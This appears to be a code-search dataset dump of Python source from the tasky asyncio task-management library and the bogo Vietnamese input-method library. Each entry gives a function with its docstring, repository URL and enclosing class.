Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.sigterm | python | def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks') | Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L304-L314 | [
"def terminate(self, *, force: bool=False, timeout: float=30.0,\n step: float=1.0) -> None:\n '''Stop all scheduled and/or executing tasks, first by asking nicely,\n and then by waiting up to `timeout` seconds before forcefully stopping\n the asyncio event loop.'''\n\n if isinstance(self.mo... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
|
jreese/tasky | tasky/config.py | Config.get | python | def get(self, key: Any, default: Any=None) -> Any:
'''Return the configured value for the given key name, or `default` if
no value is available or key is invalid.'''
return self.data.get(key, default) | Return the configured value for the given key name, or `default` if
no value is available or key is invalid. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/config.py#L28-L32 | null | class Config(Task):
'''Mechanism for providing read-only configuration values to a service,
as well as individual tasks in that service, from either a local source
or an external configuration service. Base implementation simply stores
a static dictionary, and emulates a read-only container interface.'''
def __init__(self, data: dict=None) -> None:
super().__init__()
if not data:
data = {}
self.data = data
def global_config(self) -> Any:
'''Return the global service configuration.'''
return self.data
def task_config(self, task: Task) -> Any:
'''Return the task-specific configuration.'''
return self.get(task.__class__.__name__)
async def init(self) -> None:
'''Gather initial configuration data from the backing.'''
pass
async def run(self) -> None:
'''Potentially run any amount of one-shot or ongoing async code
necessary to maintain configuration data.'''
pass
def __repr__(self):
return '{}(data={})'.format(self.name, self.data)
|
jreese/tasky | tasky/config.py | Config.task_config | python | def task_config(self, task: Task) -> Any:
'''Return the task-specific configuration.'''
return self.get(task.__class__.__name__) | Return the task-specific configuration. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/config.py#L39-L42 | [
"def get(self, key: Any, default: Any=None) -> Any:\n '''Return the configured value for the given key name, or `default` if\n no value is available or key is invalid.'''\n\n return self.data.get(key, default)\n"
] | class Config(Task):
'''Mechanism for providing read-only configuration values to a service,
as well as individual tasks in that service, from either a local source
or an external configuration service. Base implementation simply stores
a static dictionary, and emulates a read-only container interface.'''
def __init__(self, data: dict=None) -> None:
super().__init__()
if not data:
data = {}
self.data = data
def get(self, key: Any, default: Any=None) -> Any:
'''Return the configured value for the given key name, or `default` if
no value is available or key is invalid.'''
return self.data.get(key, default)
def global_config(self) -> Any:
'''Return the global service configuration.'''
return self.data
async def init(self) -> None:
'''Gather initial configuration data from the backing.'''
pass
async def run(self) -> None:
'''Potentially run any amount of one-shot or ongoing async code
necessary to maintain configuration data.'''
pass
def __repr__(self):
return '{}(data={})'.format(self.name, self.data)
|
jreese/tasky | tasky/config.py | JsonConfig.init | python | async def init(self) -> None:
'''Load configuration in JSON format from either a file or
a raw data string.'''
if self.data:
return
if self.json_data:
try:
self.data = json.loads(self.json_data)
except Exception:
Log.exception('Falied to load raw configuration')
else:
try:
with open(self.json_path, 'r') as f:
self.data = json.load(f)
except Exception:
Log.exception('Failed to load configuration from %s',
self.json_path)
self.data = {} | Load configuration in JSON format from either a file or
a raw data string. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/config.py#L72-L94 | null | class JsonConfig(Config):
'''Provide configuration from a local JSON file.'''
def __init__(self, json_path: str=None, json_data: str=None) -> None:
self.json_path = json_path
self.json_data = json_data
self.data = None
@property
def enabled(self) -> bool:
'''Enabled until data is fetched, then disabled.'''
return self.data is None
|
jreese/tasky | tasky/tasks/timer.py | TimerTask.run_task | python | async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop after `DELAY`
seconds. Track the time it takes to run, and log when it starts/stops.
If/when `reset()` is called, reset the wait time to `DELAY` seconds.'''
self.last_run = 0.0
self.target = self.time() + self.DELAY
while self.running:
try:
now = self.time()
if now < self.target:
sleep = self.target - now
await self.sleep(sleep)
elif self.last_run < self.target:
Log.debug('executing timer task %s', self.name)
self.last_run = self.time()
await self.run()
total = self.time() - self.last_run
Log.debug('finished timer task %s in %.1f seconds',
self.name, total)
else:
sleep = min(5.0, self.DELAY)
await self.sleep(sleep)
except CancelledError:
Log.debug('cancelled timer task %s', self.name)
raise
except Exception:
Log.exception('exception in timer task %s', self.name) | Execute the task inside the asyncio event loop after `DELAY`
seconds. Track the time it takes to run, and log when it starts/stops.
If/when `reset()` is called, reset the wait time to `DELAY` seconds. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/timer.py#L20-L53 | [
"async def run(self) -> None:\n '''Override this method to define what happens when your task runs.'''\n\n pass\n",
"async def sleep(self, duration: float=0.0) -> None:\n '''Simple wrapper around `asyncio.sleep()`.'''\n duration = max(0, duration)\n\n if duration > 0:\n Log.debug('sleeping t... | class TimerTask(Task):
'''Run a method on the asyncio event loop exactly once after `DELAY`
seconds. Calling the `reset()` method will postpone execution, or re-queue
execution if the timer has already completed.'''
DELAY = 60.0
def reset(self) -> None:
'''Reset task execution to `DELAY` seconds from now.'''
Log.debug('resetting timer task %s')
self.target = self.time() + self.DELAY
|
jreese/tasky | tasky/tasks/timer.py | TimerTask.reset | python | def reset(self) -> None:
'''Reset task execution to `DELAY` seconds from now.'''
Log.debug('resetting timer task %s')
self.target = self.time() + self.DELAY | Reset task execution to `DELAY` seconds from now. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/timer.py#L55-L59 | [
"def time(self) -> float:\n '''Return the current time on the asyncio event loop.'''\n\n return self.tasky.loop.time()\n"
] | class TimerTask(Task):
'''Run a method on the asyncio event loop exactly once after `DELAY`
seconds. Calling the `reset()` method will postpone execution, or re-queue
execution if the timer has already completed.'''
DELAY = 60.0
async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop after `DELAY`
seconds. Track the time it takes to run, and log when it starts/stops.
If/when `reset()` is called, reset the wait time to `DELAY` seconds.'''
self.last_run = 0.0
self.target = self.time() + self.DELAY
while self.running:
try:
now = self.time()
if now < self.target:
sleep = self.target - now
await self.sleep(sleep)
elif self.last_run < self.target:
Log.debug('executing timer task %s', self.name)
self.last_run = self.time()
await self.run()
total = self.time() - self.last_run
Log.debug('finished timer task %s in %.1f seconds',
self.name, total)
else:
sleep = min(5.0, self.DELAY)
await self.sleep(sleep)
except CancelledError:
Log.debug('cancelled timer task %s', self.name)
raise
except Exception:
Log.exception('exception in timer task %s', self.name)
|
jreese/tasky | tasky/tasks/queue.py | QueueTask.run_task | python | async def run_task(self) -> None:
'''Initialize the queue and spawn extra worker tasks if this if the
first task. Then wait for work items to enter the task queue, and
execute the `run()` method with the current work item.'''
while self.running:
try:
item = self.QUEUE.get_nowait()
Log.debug('%s processing work item', self.name)
await self.run(item)
Log.debug('%s completed work item', self.name)
self.QUEUE.task_done()
except asyncio.QueueEmpty:
if self.OPEN:
await self.sleep(0.05)
else:
Log.debug('%s queue closed and empty, stopping', self.name)
return
except CancelledError:
Log.debug('%s cancelled, dropping work item')
self.QUEUE.task_done()
raise
except Exception:
Log.exception('%s failed work item', self.name)
self.QUEUE.task_done() | Initialize the queue and spawn extra worker tasks if this if the
first task. Then wait for work items to enter the task queue, and
execute the `run()` method with the current work item. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/queue.py#L62-L92 | [
"async def run(self, item: Any) -> None:\n '''Override this method to define what happens when your task runs.'''\n\n await self.sleep(1.0)\n",
"async def sleep(self, duration: float=0.0) -> None:\n '''Simple wrapper around `asyncio.sleep()`.'''\n duration = max(0, duration)\n\n if duration > 0:\n ... | class QueueTask(Task):
'''Run a method on the asyncio event loop for each item inserted into this
task's work queue. Can use multiple "workers" to process the work queue.
Failed work items (those generating exceptions) will be dropped -- workers
must manually requeue any work items that need to be reprocessed.'''
WORKERS = 1
MAXSIZE = 0
QUEUE = None
OPEN = True
def __init__(self, id: int=0):
'''Initialize the shared work queue for all workers.'''
super().__init__()
if self.__class__.QUEUE is None:
self.__class__.QUEUE = asyncio.Queue(self.MAXSIZE)
self.id = max(0, id)
@property
def name(self):
return '{0}({1})'.format(self.__class__.__name__, self.id)
@classmethod
def close(cls):
'''Mark the queue as being "closed". Once closed, workers will stop
running once the work queue becomes empty.'''
Log.debug('closing %s work queue', cls.__name__)
cls.OPEN = False
async def init(self) -> None:
if self.id == 0:
Log.debug('initializing %s', self.name)
for task_id in range(1, self.WORKERS):
task = self.__class__(id=task_id)
Log.debug('spawning %s', task.name)
await self.tasky.insert(task)
async def run(self, item: Any) -> None:
'''Override this method to define what happens when your task runs.'''
await self.sleep(1.0)
|
jreese/tasky | tasky/tasks/periodic.py | PeriodicTask.run_task | python | async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops. After `INTERVAL` seconds,
if/once the task has finished running, run it again until `stop()`
is called.'''
while self.running:
try:
Log.debug('executing periodic task %s', self.name)
before = self.time()
await self.run()
total = self.time() - before
Log.debug('finished periodic task %s in %.1f seconds',
self.name, total)
sleep = self.INTERVAL - total
if sleep > 0:
await self.sleep(sleep)
except CancelledError:
Log.debug('cancelled periodic task %s', self.name)
raise
except Exception:
Log.exception('exception in periodic task %s', self.name) | Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops. After `INTERVAL` seconds,
if/once the task has finished running, run it again until `stop()`
is called. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/periodic.py#L18-L42 | [
"async def run(self) -> None:\n '''Override this method to define what happens when your task runs.'''\n\n pass\n",
"async def sleep(self, duration: float=0.0) -> None:\n '''Simple wrapper around `asyncio.sleep()`.'''\n duration = max(0, duration)\n\n if duration > 0:\n Log.debug('sleeping t... | class PeriodicTask(Task):
'''Run a method on the asyncio event loop every `INTERVAL` seconds.'''
INTERVAL = 60.0
|
BoGoEngine/bogo-python | bogo/utils.py | append_comps | python | def append_comps(comps, char):
c = list(comps)
if is_vowel(char):
if not c[2]: pos = 1
else: pos = 2
else:
if not c[2] and not c[1]: pos = 0
else: pos = 2
c[pos] += char
return c | Append a character to `comps` following this rule: a vowel is added to the
vowel part if there is no last consonant, else to the last consonant part;
a consonant is added to the first consonant part if there is no vowel, and
to the last consonant part if the vowel part is not empty.
>>> transform(['', '', ''])
['c', '', '']
>>> transform(['c', '', ''], '+o')
['c', 'o', '']
>>> transform(['c', 'o', ''], '+n')
['c', 'o', 'n']
>>> transform(['c', 'o', 'n'], '+o')
['c', 'o', 'no'] | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/utils.py#L51-L75 | [
"def is_vowel(char):\n char = char.lower()\n return char in VOWELS\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
VOWELS = "àáảãạaằắẳẵặăầấẩẫậâèéẻẽẹeềếểễệêìíỉĩịi" + \
"òóỏõọoồốổỗộôờớởỡợơùúủũụuừứửữựưỳýỷỹỵy"
def join(alist):
return "".join(alist)
def is_vowel(char):
char = char.lower()
return char in VOWELS
def change_case(string, case):
"""
Helper: Return new string obtained from change the given string to
desired case.
Args
string
case - 0: lower, 1: upper
"""
return string.upper() if case else string.lower()
# def gibberish_split(head, tail=""):
# """
# Try to split a string into two parts: the alphabetic part at the end and the
# rest.
# >>> gibberish_split("aoeu")
# ("", "aoeu")
# >>> gibberish_split("ao.eu")
# ("ao.", "eu")
# >>> gibberish_split("aoeu.")
# ("aoeu.", "")
# """
# if head == "" or not head[-1].isalpha():
# return (head, tail)
# else:
# return gibberish_split(head[:-1], head[-1] + tail)
def separate(string):
"""
Separate a string into smaller parts: first consonant (or head), vowel,
last consonant (if any).
>>> separate('tuong')
['t','uo','ng']
>>> separate('ohmyfkinggod')
['ohmyfkingg','o','d']
"""
def atomic_separate(string, last_chars, last_is_vowel):
if string == "" or (last_is_vowel != is_vowel(string[-1])):
return (string, last_chars)
else:
return atomic_separate(string[:-1],
string[-1] + last_chars, last_is_vowel)
head, last_consonant = atomic_separate(string, "", False)
first_consonant, vowel = atomic_separate(head, "", True)
if last_consonant and not (vowel + first_consonant):
comps = [last_consonant, '', ''] # ['', '', b] -> ['b', '', '']
else:
comps = [first_consonant, vowel, last_consonant]
# 'gi' and 'qu' are considered qualified consonants.
# We want something like this:
# ['g', 'ia', ''] -> ['gi', 'a', '']
# ['q', 'ua', ''] -> ['qu', 'a', '']
if (comps[0] != '' and comps[1] != '') and \
((comps[0] in 'gG' and comps[1][0] in 'iI' and len(comps[1]) > 1) or
(comps[0] in 'qQ' and comps[1][0] in 'uU')):
comps[0] += comps[1][:1]
comps[1] = comps[1][1:]
return comps
|
BoGoEngine/bogo-python | bogo/utils.py | separate | python | def separate(string):
def atomic_separate(string, last_chars, last_is_vowel):
if string == "" or (last_is_vowel != is_vowel(string[-1])):
return (string, last_chars)
else:
return atomic_separate(string[:-1],
string[-1] + last_chars, last_is_vowel)
head, last_consonant = atomic_separate(string, "", False)
first_consonant, vowel = atomic_separate(head, "", True)
if last_consonant and not (vowel + first_consonant):
comps = [last_consonant, '', ''] # ['', '', b] -> ['b', '', '']
else:
comps = [first_consonant, vowel, last_consonant]
# 'gi' and 'qu' are considered qualified consonants.
# We want something like this:
# ['g', 'ia', ''] -> ['gi', 'a', '']
# ['q', 'ua', ''] -> ['qu', 'a', '']
if (comps[0] != '' and comps[1] != '') and \
((comps[0] in 'gG' and comps[1][0] in 'iI' and len(comps[1]) > 1) or
(comps[0] in 'qQ' and comps[1][0] in 'uU')):
comps[0] += comps[1][:1]
comps[1] = comps[1][1:]
return comps | Separate a string into smaller parts: first consonant (or head), vowel,
last consonant (if any).
>>> separate('tuong')
['t','uo','ng']
>>> separate('ohmyfkinggod')
['ohmyfkingg','o','d'] | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/utils.py#L96-L131 | [
"def atomic_separate(string, last_chars, last_is_vowel):\n if string == \"\" or (last_is_vowel != is_vowel(string[-1])):\n return (string, last_chars)\n else:\n return atomic_separate(string[:-1],\n string[-1] + last_chars, last_is_vowel)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
VOWELS = "àáảãạaằắẳẵặăầấẩẫậâèéẻẽẹeềếểễệêìíỉĩịi" + \
"òóỏõọoồốổỗộôờớởỡợơùúủũụuừứửữựưỳýỷỹỵy"
def join(alist):
return "".join(alist)
def is_vowel(char):
char = char.lower()
return char in VOWELS
def change_case(string, case):
"""
Helper: Return new string obtained from change the given string to
desired case.
Args
string
case - 0: lower, 1: upper
"""
return string.upper() if case else string.lower()
def append_comps(comps, char):
"""
Append a character to `comps` following this rule: a vowel is added to the
vowel part if there is no last consonant, else to the last consonant part;
a consonant is added to the first consonant part if there is no vowel, and
to the last consonant part if the vowel part is not empty.
>>> transform(['', '', ''])
['c', '', '']
>>> transform(['c', '', ''], '+o')
['c', 'o', '']
>>> transform(['c', 'o', ''], '+n')
['c', 'o', 'n']
>>> transform(['c', 'o', 'n'], '+o')
['c', 'o', 'no']
"""
c = list(comps)
if is_vowel(char):
if not c[2]: pos = 1
else: pos = 2
else:
if not c[2] and not c[1]: pos = 0
else: pos = 2
c[pos] += char
return c
# def gibberish_split(head, tail=""):
# """
# Try to split a string into two parts: the alphabetic part at the end and the
# rest.
# >>> gibberish_split("aoeu")
# ("", "aoeu")
# >>> gibberish_split("ao.eu")
# ("ao.", "eu")
# >>> gibberish_split("aoeu.")
# ("aoeu.", "")
# """
# if head == "" or not head[-1].isalpha():
# return (head, tail)
# else:
# return gibberish_split(head[:-1], head[-1] + tail)
|
BoGoEngine/bogo-python | bogo/accent.py | get_accent_char | python | def get_accent_char(char):
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE | Get the accent of an single char, if any. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L45-L53 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
